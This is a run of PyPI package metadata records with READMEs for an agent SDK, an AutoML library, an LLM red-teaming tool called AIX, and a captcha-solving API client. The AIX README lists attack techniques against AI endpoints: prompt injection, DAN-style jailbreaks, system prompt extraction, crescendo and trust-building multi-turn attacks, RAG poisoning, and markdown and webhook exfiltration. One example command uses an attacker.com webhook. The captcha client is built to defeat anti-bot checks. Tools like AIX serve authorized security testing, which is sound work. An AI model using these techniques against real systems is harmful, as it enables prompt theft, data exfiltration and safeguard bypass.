- **💻 Modern CLI**: Rich terminal interface with fuzzy search and multiple output formats
## 🎙️ Local Voice (LiveKit, Beta)
You can run a local voice loop that joins a LiveKit room, transcribes your speech, routes text into an agent, and speaks the reply back.
### Prerequisites
- LiveKit server running (monorepo dev: `make -C python/aip-agents livekit-up`)
- LiveKit Meet open in browser (monorepo dev: `make -C python/aip-agents livekit-meet-open`)
- `OPENAI_API_KEY` set (used by `livekit-plugins-openai` for STT/TTS)
### Monorepo Demo Sequence
```bash
# One-time install
make -C python/aip-agents install-audio
# Terminal 1: LiveKit server
make -C python/aip-agents livekit-up
# Terminal 2: Join with browser (enable mic)
make -C python/aip-agents livekit-meet-open
# Terminal 3: Run agent (recommended: debug logs)
AIP_AUDIO_DEBUG=1 make -C python/aip-agents audio-agent-up
# Optional: validate join/disconnect (no browser, no mic)
make -C python/aip-agents livekit-smoke-join
```
Tip: If STT shows odd fragments, it's often speaker-to-mic echo; use headphones.
Example `.env` values for the repo defaults:
```bash
LIVEKIT_URL=ws://localhost:7880
LIVEKIT_API_KEY=devkey
LIVEKIT_API_SECRET=devsecretdevsecretdevsecretdevsecret
LIVEKIT_ROOM_NAME=aip-audio-demo
OPENAI_API_KEY=...
```
### Install
```bash
pip install "glaip-sdk[audio]"
```
### Run the SDK example
From the repo:
```bash
cd python/glaip-sdk
poetry install --extras "audio"
poetry run python examples/sdk/05_audio_session.py
```
More details:
- `python/glaip-sdk/docs/how-to-guides/audio-interface.md`
- `python/glaip-sdk/examples/sdk/livekit-local-dev.md`
## 🌳 Live Steps Panel
The CLI steps panel now streams a fully hierarchical tree so you can audit complex agent runs without leaving the terminal.
- Renders parent/child relationships with `│├└` connectors, even when events arrive out of order
- Marks running steps with spinners and duration badges sourced from SSE metadata before local fallbacks
- Highlights failures inline (`✗ reason`) and raises warning glyphs on affected delegate branches
- Derives deterministic “💭 Thinking…” spans before/after each delegate or tool action to show scheduling gaps
- Flags parallel work with a dedicated glyph and argument-derived labels so simultaneous tool calls stay readable
- Try it locally: `poetry run python scripts/replay_steps_log.py --transcript tests/fixtures/rendering/transcripts/parallel_research.jsonl --output /tmp/parallel.log`
## 📚 Documentation
📖 **[Complete Documentation](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/overview)** - Visit our GitBook for comprehensive guides, tutorials, and API reference.
Quick links:
- **[Quick Start Guide](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/get-started/quick-start-guide)**: Get your first agent running in 5 minutes
- **[Agent Management](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/agents-guide)**: Complete agent lifecycle management
- **[Custom Tools](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/tools-guide)**: Build and integrate custom tools
- **[MCP Integration](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/mcps-guide)**: Connect external services
- **[API Reference](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/reference/python-sdk-reference)**: Complete SDK reference
## 🧪 Simulate the Update Notifier
Need to verify the in-session upgrade flow without hitting PyPI or actually running `pip install`? Use the bundled helper:
```bash
cd python/glaip-sdk
poetry run python scripts/mock_update_notifier.py
# or customize the mock payload:
# poetry run python scripts/mock_update_notifier.py --version 3.3.3 --marker "[nightly build]"
```
The script:
- Launches a SlashSession with prompt-toolkit disabled (so it runs cleanly in tests/CI).
- Forces the notifier to believe a newer version exists (`--version 9.9.9` by default).
- Appends a visible marker (default `[mock update]`) to the banner so you can prove the branding reload happened; pass `--marker ""` to skip.
- Auto-selects “Update now”, mocks the install step, and runs the real branding refresh logic.
- Resets module metadata afterwards so your environment remains untouched.
You should see the Rich banner re-render with the mocked version (and optional marker) at the end of the run.
| text/markdown | Raymond Christopher | raymond.christopher@gdplabs.id | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | <3.13,>=3.11 | [] | [] | [] | [
"httpx>=0.28.1",
"pydantic>=2.0.0",
"pyyaml>=6.0.0",
"python-dotenv<2.0.0,>=1.1.1",
"readchar<5.0.0,>=4.2.1",
"questionary<3.0.0,>=2.1.0",
"click<8.3.0,>=8.2.0",
"rich>=13.0.0",
"packaging>=23.2",
"textual>=0.52.0",
"gllm-core-binary>=0.1.0",
"langchain-core>=0.3.0",
"gllm-tools-binary>=0.1.3",
"aip-agents-binary[local]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"local\"",
"aip-agents-binary[memory]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"memory\"",
"aip-agents-binary[privacy]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"privacy\"",
"aip-agents-binary[guardrails]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"guardrails\"",
"aip-agents-binary[audio]>=0.6.23; (python_version >= \"3.11\" and python_version < \"3.13\") and extra == \"audio\"",
"gllm-pipeline-binary==0.4.23; extra == \"pipeline\"",
"gllm-inference-binary<0.6.0,>=0.5.0; extra == \"pipeline\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"pytest-dotenv>=0.5.2; extra == \"dev\"",
"pre-commit>=4.3.0; extra == \"dev\"",
"pytest-xdist>=3.8.0; extra == \"dev\"",
"pytest-asyncio>=0.23.6; extra == \"dev\"",
"pytest-timeout>=2.3.1; extra == \"dev\"",
"ruff>=0.14.0; extra == \"dev\""
] | [] | [] | [] | [] | poetry/2.1.4 CPython/3.11.0 Linux/5.10.0-32-cloud-amd64 | 2026-02-20T09:12:50.208124 | glaip_sdk-0.8.5-py3-none-any.whl | 572,356 | 04/d9/3183a789f772de12e30aead64c81cb6ea63005b1782145f9019a69454eec/glaip_sdk-0.8.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 060b2437d1e6ff31f424a9256d312e8f | b970e79ef625739e082cec0dbf74b838e90857a3581d4e1675c61bf1c54322ce | 04d93183a789f772de12e30aead64c81cb6ea63005b1782145f9019a69454eec | null | [] | 126 |
2.4 | pyezml | 0.2.1 | Beginner-friendly AutoML library for tabular data |
# pyezml 🚀
**Beginner-Friendly AutoML for Tabular Data**





Train machine learning models in **one line of code** — no ML expertise required.
pyezml is a lightweight yet powerful AutoML library that automatically handles preprocessing, model selection, and prediction so you can focus on results.
Built for students, developers, analysts, and beginners who want fast, reliable predictions without complex pipelines.
---
## 🚀 What's New in v0.2.0
- **Labeled probability predictions**
- **Auto-save via `save=` parameter**
- **Automatic `.pkl` extension handling**
- **Robust DataFrame prediction support**
- **Built-in sample data generators**
- **Unified prediction pipeline**
---
## 🚀 Installation
```bash
pip install pyezml
````
**Optional (recommended for best mode):**
```bash
pip install lightgbm
```
**Requirements**
* Python ≥ 3.8
---
## ⚡ Quick Example
```python
from ezml import train_model
model = train_model("data.csv", target="price")
print(model.score())
```
That’s it — model trained and evaluated.
---
## 🧪 Generate Sample Data (NEW)
No dataset? No problem.
```python
from ezml.datasets import make_classification_data
from ezml import train_model
df = make_classification_data()
model = train_model(df, target="target")
print(model.score())
```
Perfect for quick testing and demos.
---
## 🔮 Labeled Probability Predictions (NEW)
pyezml returns **human-readable probabilities**:
```python
probs = model.predict_proba({
"feature_0": 0.5,
"feature_1": -1.2
})
print(probs)
```
Example output:
```python
[{'No': 0.12, 'Yes': 0.88}]
```
No index guessing required.
---
## 💾 Auto-Save Models (NEW)
Save automatically during training:
```python
model = train_model(
df,
target="target",
save="my_model" # .pkl added automatically
)
```
Manual save still works:
```python
model.save("model.pkl")
```
---
## 🔧 Advanced Usage
```python
from ezml import AutoModel
model = AutoModel(mode="best") # fast | best
model.train("data.csv", target="price")
print(model.score())
print(model.feature_importance())
```
---
## ⚡ Model Modes
pyezml provides two performance modes:
### 🚀 fast (default)
* **Model:** RandomForest
* **Best for:** small to medium datasets
* **Why use it:** fast, robust, beginner-safe
### 🔥 best
* **Model:** LightGBM
* **Best for:** larger datasets and higher accuracy
* **Why use it:** stronger learning on complex tabular data
> 💡 Automatically falls back to RandomForest if LightGBM is unavailable.
---
## 📊 Metrics API
After training:
### Classification
* Accuracy
* F1-score
### Regression
* R² score
* MAE
Example:
```python
print(model.metrics_)
print(model.score()) # primary metric
```
---
## 🔮 Flexible Prediction Inputs
### Dict (recommended)
```python
model.predict({"feature1": value1, "feature2": value2})
```
### Batch dict
```python
model.predict([
{"feature1": v1, "feature2": v2},
{"feature1": v3, "feature2": v4}
])
```
### pandas DataFrame
```python
model.predict(df)
```
---
## 🧹 Automatic Preprocessing
pyezml automatically handles:
* Missing value imputation
* Categorical encoding
* Optional feature scaling
* Column alignment during prediction
No manual preprocessing required.
---
## 📓 Demo Notebook
See the full working example:
👉 examples/pyezml_demo.ipynb
---
## 🎯 Project Goal
pyezml aims to make machine learning:
* simple
* fast
* accessible
* beginner-friendly
without sacrificing real-world usability.
---
## 🤝 Contributing
Contributions, issues, and suggestions are welcome!
If you find a bug or have an idea:
1. Fork the repo
2. Create a feature branch
3. Submit a pull request
---
## 📜 License
MIT License — free to use and modify.
---
## ⭐ Support
If you find pyezml useful, consider giving the repository a star ⭐
It helps the project grow!
| text/markdown | null | Ajay Ray Samala <ajaysamala51@gmail.com> | null | null | MIT | automl, machine learning, python, ml, tabular | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pandas",
"numpy",
"scikit-learn",
"joblib",
"lightgbm"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.10 | 2026-02-20T09:12:23.502670 | pyezml-0.2.1.tar.gz | 11,564 | 45/04/44d673b274cd3711ddd6f4e1e912f526c6ef06a1348363a5fe2aa0d8ae57/pyezml-0.2.1.tar.gz | source | sdist | null | false | 5c8c05b453f065402bc7f4634a47eb24 | 70dd26ad14e278b028b9067790fad6fa48f75db28486cf81afd9ac3243aab01e | 450444d673b274cd3711ddd6f4e1e912f526c6ef06a1348363a5fe2aa0d8ae57 | null | [
"LICENSE"
] | 218 |
2.4 | aix-framework | 1.1.0 | AIX - AI eXploit Framework: Comprehensive security testing toolkit for AI/LLM systems | # AIX - AI eXploit Framework
```
▄▀█ █ ▀▄▀
█▀█ █ █ █ v1.1.0
AI Security Testing Framework
```
**The first comprehensive AI/LLM security testing tool.**
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pepy.tech/projects/aix-framework)
---
## What is AIX?
AIX is an automated security testing framework for AI/LLM endpoints. It provides penetration testers and red teamers with the tools to assess AI systems for vulnerabilities including:
- **Prompt Injection** - Direct and indirect injection attacks
- **Jailbreaking** - Bypass AI safety restrictions
- **System Prompt Extraction** - Extract hidden instructions
- **Data Leakage** - Training data and PII extraction
- **Data Exfiltration** - Test exfil channels (markdown, links)
- **Agent Exploitation** - Tool abuse and privilege escalation
- **DoS Attacks** - Token exhaustion and resource abuse
- **Fuzzing** - Edge cases and encoding attacks
- **Memory Attacks** - Context manipulation and poisoning
- **RAG Attacks** - Knowledge base and retrieval vulnerabilities
- **Multi-Turn Attacks** - Conversation-based exploitation (crescendo, trust building, context poisoning)
- **Model Fingerprinting** - Probabilistic LLM identification via embedding and pattern analysis
- **Attack Chains** - YAML-defined attack workflows with conditional branching and state passing
---
## Installation
```bash
# Clone the repository
git clone https://github.com/r08t/aix-framework.git
cd aix-framework
# Install script
chmod +x install.sh
./install.sh
# OR
# Install dependencies
pip install -r requirements.txt
# Install AIX
pip install -e .
# Verify installation
aix --version
```
### Optional Dependencies
```bash
# ML features (embedding-based model fingerprinting)
pip install aix-framework[ml]
# Development tools
pip install aix-framework[dev]
```
---
## Quick Start
```bash
# Basic reconnaissance
aix recon https://api.target.com/chat
# Test for prompt injection
aix inject https://api.target.com/chat -k sk-xxx
# Run all modules
aix scan https://api.target.com/chat -k sk-xxx
# Run attack chain playbook
aix chain https://api.target.com/chat -k sk-xxx -P full_compromise
# Use with Burp Suite request file
aix inject -r request.txt -p "messages[0].content"
# Target a WebSocket endpoint
aix inject ws://api.target.com/ws -k sk-xxx
aix scan wss://api.target.com/ws -k sk-xxx
# Generate HTML report
aix db --export report.html
# View sessions and conversations
aix db --sessions
aix db --conversations
```
---
## Modules
### recon - Reconnaissance
Discover AI endpoint details including API structure, authentication, input filters, model fingerprinting, and rate limits. Includes built-in fingerprinting to identify the underlying LLM model.
```bash
aix recon https://company.com/chatbot
aix recon -r request.txt -p "messages[0].content"
aix recon https://api.company.com -o profile.json
```
### fingerprint - Model Fingerprinting
Identify the underlying LLM model behind an endpoint using probabilistic analysis. Supports two strategies: embedding-based (high accuracy, requires `aix-framework[ml]`) and pattern-based (default fallback using regex matching and softmax scoring).
```bash
aix fingerprint https://api.target.com -k sk-xxx
aix fingerprint -r request.txt -p "messages[0].content"
```
### inject - Prompt Injection
Test for prompt injection vulnerabilities including direct injection, indirect injection, context manipulation, and instruction override.
```bash
aix inject https://api.target.com -k sk-xxx
aix inject -r request.txt -p "messages[0].content"
aix inject --profile company.com --evasion aggressive
```
### jailbreak - Bypass Restrictions
Test restriction bypass techniques including DAN variants, character roleplay, developer mode, and hypothetical framing.
```bash
aix jailbreak https://chat.company.com
aix jailbreak -r request.txt -p "messages[0].content"
aix jailbreak --profile company.com --test-harmful
```
### extract - System Prompt Extraction
Extract hidden system prompts using direct extraction, roleplay extraction, translation tricks, and repeat/format abuse.
```bash
aix extract https://api.target.com -k sk-xxx
aix extract -r request.txt -p "messages[0].content"
aix extract --profile company.com
```
### leak - Training Data Extraction
Test for data leakage including PII in responses, memorized training data, RAG document leakage, and model architecture info.
```bash
aix leak https://api.target.com -k sk-xxx
aix leak -r request.txt -p "messages[0].content"
aix leak --profile company.com
```
### exfil - Data Exfiltration
Test data exfiltration channels including markdown image injection, link injection, hidden iframes, and webhook callbacks.
```bash
aix exfil https://api.target.com -k sk-xxx --webhook https://attacker.com
aix exfil -r request.txt -p "messages[0].content"
aix exfil --profile company.com
```
### agent - Agent Exploitation
Test AI agent vulnerabilities including tool abuse, unauthorized actions, privilege escalation, and code execution.
```bash
aix agent https://agent.target.com -k sk-xxx
aix agent -r request.txt -p "messages[0].content"
aix agent --profile company.com
```
### dos - Denial of Service
Test resource exhaustion including token exhaustion, rate limit testing, infinite loop prompts, and memory exhaustion.
```bash
aix dos https://api.target.com -k sk-xxx
aix dos -r request.txt -p "messages[0].content"
aix dos --profile company.com
```
### fuzz - Fuzzing
Test edge cases and malformed input including unicode fuzzing, format string attacks, boundary testing, and encoding attacks.
```bash
aix fuzz https://api.target.com -k sk-xxx
aix fuzz -r request.txt -p "messages[0].content"
aix fuzz --profile company.com --iterations 500
```
### memory - Memory Attacks
Test memory and context vulnerabilities including context window overflow, conversation history poisoning, persistent memory manipulation, context bleeding, and recursive attacks.
```bash
aix memory https://api.target.com -k sk-xxx
aix memory -r request.txt -p "messages[0].content"
```
### rag - RAG Attacks
Test RAG (Retrieval-Augmented Generation) specific vulnerabilities including indirect prompt injection via documents, context poisoning, source manipulation, retrieval bypass, knowledge base extraction, and chunk boundary attacks.
```bash
aix rag https://api.target.com -k sk-xxx
aix rag -r request.txt -p "messages[0].content"
aix rag --profile company.com
```
**RAG Attack Categories:**
| Category | Description | Risk |
|----------|-------------|------|
| Indirect Injection | Instructions hidden in documents that get retrieved | CRITICAL |
| Context Poisoning | Adversarial content injected via retrieval | CRITICAL |
| Source Manipulation | Extract or spoof document sources/citations | HIGH |
| Retrieval Bypass | Make LLM ignore retrieved documents | HIGH |
| KB Extraction | Extract info about the knowledge base | MEDIUM |
| Chunk Boundary | Exploit document chunking logic | MEDIUM |
### multiturn - Multi-Turn Attacks
Advanced attacks that exploit conversation context across multiple turns. These attacks bypass single-shot defenses by building context, trust, or injecting instructions gradually.
```bash
aix multiturn https://api.target.com -k sk-xxx
aix multiturn -r request.txt -p "messages[0].content"
aix multiturn https://api.target.com --category crescendo --level 3
aix multiturn --profile company.com --max-turns 5 --turn-delay 1.0
```
**Multi-Turn Attack Categories:**
| Category | Description | Risk |
|----------|-------------|------|
| Crescendo | Gradually escalate from benign to malicious across turns | CRITICAL |
| Trust Building | Establish rapport and helpfulness before payload delivery | HIGH |
| Context Poisoning | Define terms/concepts early, abuse them in later turns | HIGH |
| Role Lock | Deep persona establishment that persists across turns | HIGH |
| Memory Injection | Inject false memories of previous conversations | MEDIUM |
| Instruction Layering | Stack partial instructions across turns, combine at end | CRITICAL |
| Cognitive Overload | Overwhelm with complexity before slipping in attack | MEDIUM |
| Authority Transfer | Establish expert authority, then leverage it | MEDIUM |
**Multi-Turn Specific Options:**
| Option | Description |
|--------|-------------|
| `--category` | Filter by attack category (crescendo, trust_building, etc.) |
| `--max-turns` | Maximum turns per sequence (default: 10) |
| `--turn-delay` | Delay between turns in seconds (default: 0.5) |
### chain - Attack Chains
Execute multi-step attack workflows defined in YAML playbooks. Chains support conditional branching, variable interpolation, and state passing between steps.
```bash
aix chain https://api.target.com -k sk-xxx -P full_compromise
aix chain -r request.txt -p "messages[0].content" -P prompt_theft
aix chain https://api.target.com -P rag_pwn -V level=3 -V evasion=aggressive
aix chain --list # List available playbooks
aix chain --show full_compromise # Show playbook structure
aix chain --dry-run -P quick_scan # Preview execution plan
```
**Pre-Built Playbooks:**
| Playbook | Description |
|----------|-------------|
| `full_compromise` | Complete attack chain from recon to data exfiltration |
| `data_exfil` | Data exfiltration focused chain |
| `prompt_theft` | System prompt extraction chains |
| `quick_scan` | Fast security assessment |
| `rag_pwn` | RAG-specific attack sequences |
| `stealth_recon` | Low-noise reconnaissance |
**Chain-Specific Options:**
| Option | Description |
|--------|-------------|
| `-P, --playbook` | Playbook name or path to YAML file |
| `-V, --var` | Override playbook variables (`key=value`) |
| `--list` | List available playbooks |
| `--show` | Show playbook structure |
| `--dry-run` | Preview execution plan without running |
| `--no-viz` | Disable live visualization |
| `--export-mermaid` | Export chain as Mermaid diagram |
### scan - Full Scan
Run all modules against a target for comprehensive security assessment.
```bash
aix scan https://api.target.com -k sk-xxx
aix scan -r request.txt -p "messages[0].content"
aix scan --profile company.com --evasion aggressive
```
---
## Common Options
| Option | Short | Description |
|--------|-------|-------------|
| `--request` | `-r` | Request file (Burp Suite format) |
| `--param` | `-p` | Parameter path for injection (e.g., `messages[0].content`) |
| `--key` | `-k` | API key for direct API access |
| `--profile` | `-P` | Use saved profile |
| `--verbose` | `-v` | Verbose output (`-v`: reasons, `-vv`: debug) |
| `--output` | `-o` | Output file for results |
| `--proxy` | | HTTP proxy for outbound requests (host:port) |
| `--cookie` | `-C` | Cookies for authentication (`key=value; ...`) |
| `--headers` | `-H` | Custom headers (`key:value; ...`) |
| `--format` | `-F` | Request body format (`json`, `form`, `multipart`) |
| `--level` | | Test level (1-5, higher = more tests) |
| `--risk` | | Risk level (1-3, higher = riskier tests) |
| `--show-response` | | Show AI response for findings |
| `--verify-attempts` | `-va` | Number of verification attempts |
### Session Refresh Options
| Option | Description |
|--------|-------------|
| `--refresh-url` | URL to fetch new session ID if expired |
| `--refresh-regex` | Regex to extract session ID from refresh response |
| `--refresh-param` | Parameter to update with new session ID |
| `--refresh-error` | String/Regex in response body that triggers refresh |
### AI Engine Options
| Option | Description |
|--------|-------------|
| `--ai` | AI provider for evaluation and context (`openai`, `anthropic`, `ollama`, `gemini`) |
| `--ai-key` | API key for AI provider |
| `--ai-model` | Model to use (e.g., `gpt-4o`, `claude-3-sonnet`) |
| `--no-eval` | Disable LLM-as-a-Judge evaluation |
| `--no-context` | Disable AI context gathering |
| `--generate` / `-g` | Generate N context-aware payloads using AI |
### Legacy LLM Evaluation Options
| Option | Description |
|--------|-------------|
| `--eval-url` | URL for secondary LLM evaluation |
| `--eval-key` | API key for secondary LLM |
| `--eval-model` | Model for secondary LLM |
| `--eval-provider` | Provider (`openai`, `anthropic`, `ollama`, `gemini`) |
---
## Attack Chain Playbooks
Create custom attack workflows with YAML playbooks:
```yaml
# my_chain.yaml
name: "Custom Attack Chain"
description: "My custom attack workflow"
version: "1.0"
config:
stop_on_critical: true
continue_on_module_fail: false
max_duration: 300
variables:
evasion: "light"
level: 2
steps:
# Step 1: Reconnaissance
- id: recon
name: "Target Reconnaissance"
module: recon
config:
level: "{{level}}"
store:
has_rag: "findings.has_rag"
on_success: next_step
on_fail: abort
# Step 2: Conditional branching
- id: next_step
type: condition
conditions:
- if: "{{has_rag}} == true"
then: rag_attack
- else: inject_attack
# Step 3a: RAG path
- id: rag_attack
module: rag
config:
level: "{{level}}"
on_success: report
on_fail: report
# Step 3b: Injection path
- id: inject_attack
module: inject
config:
evasion: "{{evasion}}"
on_success: report
on_fail: report
# Final step
- id: report
type: report
config:
format: "html"
```
Run your custom playbook:
```bash
aix chain https://target.com -P ./my_chain.yaml -k sk-xxx
```
---
## Using Burp Suite Requests
Export a request from Burp Suite and use it with AIX:
```bash
# Save request from Burp Suite to request.txt
aix inject -r request.txt -p "messages[0].content"
```
The `-p` parameter specifies the JSON path to the injection point. Examples:
- `messages[0].content` - First message content
- `prompt` - Direct prompt field
- `input.text` - Nested input field
---
## WebSocket Support
AIX supports WebSocket endpoints (`ws://` and `wss://`) natively. Use them exactly like HTTP targets:
```bash
aix recon ws://api.target.com/chat
aix inject wss://api.target.com/chat -k sk-xxx
aix scan wss://api.target.com/chat -k sk-xxx
```
### Chat ID Tracking
For stateful APIs that return a session or chat ID in the response, AIX can extract and reuse it automatically across requests:
| Option | Description |
|--------|-------------|
| `--chat-id-path` | Dot-path to extract chat ID from response JSON (e.g., `data.chat_id`) |
| `--chat-id-param` | Request parameter to inject the captured chat ID into |
| `--new-chat` | Force a new conversation for each payload (ignore existing chat ID) |
| `--reuse-chat` | Reuse the same chat ID for all payloads in this run |
```bash
# Extract chat_id from response and send it back in subsequent requests
aix inject https://api.target.com/chat --chat-id-path data.chat_id --chat-id-param chat_id
```
> **Note:** HTTP proxy is not supported for WebSocket connections. SSL verification is disabled for `wss://` (same as other connectors, for use with Burp/ZAP).
---
## Database & Reporting
```bash
# View all results
aix db
# Filter by target
aix db --target company.com
# Filter by module
aix db --module inject
# Export HTML report
aix db --export report.html
# Clear database
aix db --clear
# --- Sessions ---
# List all sessions (grouped by target)
aix db --sessions
# Show results for a specific session
aix db --session <session-id>
# --- Conversations ---
# List all recorded conversations (multi-turn)
aix db --conversations
# Show full transcript for a specific conversation
aix db --conversation <conversation-id>
```
All scan runs are automatically grouped into **sessions** by target. Multi-turn attack transcripts are stored as **conversations** and linked to both their session and individual findings.
---
## AI-Powered Features
AIX includes AI-powered features for smarter testing:
### Context Gathering
Automatically analyze the target AI to understand its purpose, domain, and capabilities:
```bash
aix recon https://api.target.com --ai openai --ai-key sk-xxx
```
This probes the target and extracts:
- **Purpose**: What the AI is designed to do (customer_support, code_assistant, etc.)
- **Domain**: Operating sector (finance, healthcare, legal, etc.)
- **Capabilities**: RAG, tools, code generation, etc.
- **Restrictions**: Detected guardrails and limitations
- **Suggested Attacks**: Recommended attack vectors
### Context-Aware Payload Generation
Generate payloads tailored to the target's specific purpose and domain:
```bash
# Generate 5 context-aware payloads
aix inject https://api.target.com --ai openai --ai-key sk-xxx -g 5
# Works on all modules
aix jailbreak https://api.target.com --ai openai --ai-key sk-xxx -g 5
aix extract https://api.target.com --ai openai --ai-key sk-xxx -g 5
aix rag https://api.target.com --ai openai --ai-key sk-xxx -g 5
```
Generated payloads use domain-specific language and are framed as legitimate requests within the AI's expected purpose.
### LLM-as-a-Judge Evaluation
Use a secondary LLM to evaluate attack success instead of keyword matching:
```bash
aix inject https://api.target.com --ai openai --ai-key sk-xxx
```
This provides:
- Lower false positives (understands context)
- Better detection of subtle bypasses
- Reasoning explanations for each finding
---
## Evasion Levels
| Level | Description |
|-------|-------------|
| `none` | No evasion, raw payloads |
| `light` | Basic obfuscation (default) |
| `aggressive` | Heavy encoding and bypass techniques |
```bash
aix inject https://target.com --evasion aggressive
```
---
## Contributing
Contributions are welcome! Please feel free to submit issues and pull requests.
### Adding Payloads
1. Fork the repository
2. Add payloads to the appropriate JSON file in `aix/payloads/`
3. Follow the payload structure:
```json
{
"name": "payload_name",
"payload": "The actual payload text",
"indicators": ["success", "indicators", "to", "match"],
"severity": "CRITICAL|HIGH|MEDIUM|LOW",
"category": "category_name",
"level": 1,
"risk": 1
}
```
4. Test against safe targets
5. Submit pull request
### Adding Modules
1. Create module in `aix/modules/`
2. Create payloads in `aix/payloads/`
3. Update `aix/modules/__init__.py`
4. Add CLI command in `aix/cli.py`
---
## Disclaimer
This tool is intended for authorized security testing only. Always obtain proper authorization before testing AI systems. The authors are not responsible for misuse of this tool.
**Only use AIX on systems you have permission to test.**
---
## License
MIT License - see [LICENSE](LICENSE) for details.
---
**Made with ❤️ by the r08t**
| text/markdown | null | Simone Licitra <r08t@proton.me> | null | Simone Licitra <r08t@proton.me> | MIT | ai, llm, security, pentesting, red-team, prompt-injection, jailbreak, ai-security, vulnerability-scanner, owasp | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Security",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.0.0",
"rich>=13.0.0",
"httpx[http2]>=0.25.0",
"aiohttp>=3.9.0",
"pyyaml>=6.0.0",
"mitmproxy>=10.0.0; extra == \"full\"",
"websockets>=12.0; extra == \"full\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"pre-commit>=3.0.0; extra == \"dev\"",
"sentence-transformers>=2.2.0; extra == \"ml\"",
"numpy>=1.24.0; extra == \"ml\"",
"mkdocs>=1.5.0; extra == \"docs\"",
"mkdocs-material>=9.0.0; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/licitrasimone/aix-framework",
"Documentation, https://github.com/licitrasimone/aix-framework#readme",
"Repository, https://github.com/licitrasimone/aix-framework.git",
"Issues, https://github.com/licitrasimone/aix-framework/issues",
"Changelog, https://github.com/licitrasimone/aix-framework/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:11:15.118472 | aix_framework-1.1.0.tar.gz | 212,071 | 30/2d/b1e7ba1e6c209ef0cfd3075b6375d21526ef02c395fa33a1be3a8cc6cefc/aix_framework-1.1.0.tar.gz | source | sdist | null | false | f15f967cb8e9bde835894ff0bd47e634 | d8b24c21373cb529fb75bdc013e3882f8c64141f2cc300e4a7b4bd43184bb6e6 | 302db1e7ba1e6c209ef0cfd3075b6375d21526ef02c395fa33a1be3a8cc6cefc | null | [
"LICENSE"
] | 228 |
2.4 | 2captcha-python | 2.0.3 | Python module for easy integration with 2Captcha API | <a href="https://github.com/2captcha/2captcha-python"><img src="https://github.com/user-attachments/assets/a737d428-5233-4605-9d09-211fa213d069" width="82" height="30"></a>
<a href="https://github.com/2captcha/2captcha-javascript"><img src="https://github.com/user-attachments/assets/4d3b4541-34b2-4ed2-a687-d694ce67e5a6" width="36" height="30"></a>
<a href="https://github.com/2captcha/2captcha-go"><img src="https://github.com/user-attachments/assets/ab22182e-6cb2-41fa-91f4-d5e89c6d7c6f" width="63" height="30"></a>
<a href="https://github.com/2captcha/2captcha-ruby"><img src="https://github.com/user-attachments/assets/0270d56f-79b0-4c95-9b09-4de89579914b" width="75" height="30"></a>
<a href="https://github.com/2captcha/2captcha-cpp"><img src="https://github.com/user-attachments/assets/36de8512-acfd-44fb-bb1f-b7c793a3f926" width="45" height="30"></a>
<a href="https://github.com/2captcha/2captcha-php"><img src="https://github.com/user-attachments/assets/e8797843-3f61-4fa9-a155-ab0b21fb3858" width="52" height="30"></a>
<a href="https://github.com/2captcha/2captcha-java"><img src="https://github.com/user-attachments/assets/a3d923f6-4fec-4c07-ac50-e20da6370911" width="50" height="30"></a>
<a href="https://github.com/2captcha/2captcha-csharp"><img src="https://github.com/user-attachments/assets/f4d449de-780b-49ed-bb0a-b70c82ec4b32" width="38" height="30"></a>
# Python Module for 2Captcha API (captcha solver)
The easiest way to quickly integrate the [2Captcha] captcha-solving service into your code and automate the solving of any type of captcha.
Examples of API requests for different captcha types are available on the [Python captcha solver](https://2captcha.com/lang/python) page.
- [Python Module for 2Captcha API (captcha solver)](#python-module-for-2captcha-api-captcha-solver)
- [Installation](#installation)
- [Configuration](#configuration)
- [TwoCaptcha instance options](#twocaptcha-instance-options)
- [Solve captcha](#solve-captcha)
- [Captcha options](#captcha-options)
- [Normal Captcha](#normal-captcha)
- [Audio Captcha](#audio-captcha)
- [Text Captcha](#text-captcha)
- [reCAPTCHA v2](#recaptcha-v2)
- [reCAPTCHA v3](#recaptcha-v3)
- [FunCaptcha](#funcaptcha)
- [GeeTest](#geetest)
- [GeeTest v4](#geetest-v4)
- [Yandex Smart](#yandex-smart)
- [Lemin Cropped Captcha](#lemin-cropped-captcha)
- [Cloudflare Turnstile](#cloudflare-turnstile)
- [Amazon WAF](#amazon-waf)
- [KeyCaptcha](#keycaptcha)
- [atbCAPTCHA](#atbcaptcha)
- [Capy](#capy)
- [Grid](#grid)
- [Canvas](#canvas)
